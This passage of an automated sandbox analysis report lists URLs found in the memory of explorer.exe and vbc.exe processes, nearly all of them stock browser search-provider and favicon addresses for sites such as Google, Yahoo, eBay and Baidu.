Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000006.00000000.2204888714.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000006.00000000.2202476584.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2219748309.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: vbc.exe, 00000004.00000002.2182475008.0000000001202000.00000020.00020000.sdmp, vbc.exe, 00000005.00000002.2230139521.0000000001202000.00000020.00020000.sdmp String found in binary or memory: http://weather.gc.ca/astro/seeing_e.html)
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000006.00000000.2204196235.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.2202476584.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.2219748309.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000006.00000002.2393631974.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2204196235.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2202476584.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.2204196235.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2201932167.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000002.2393313509.0000000000260000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
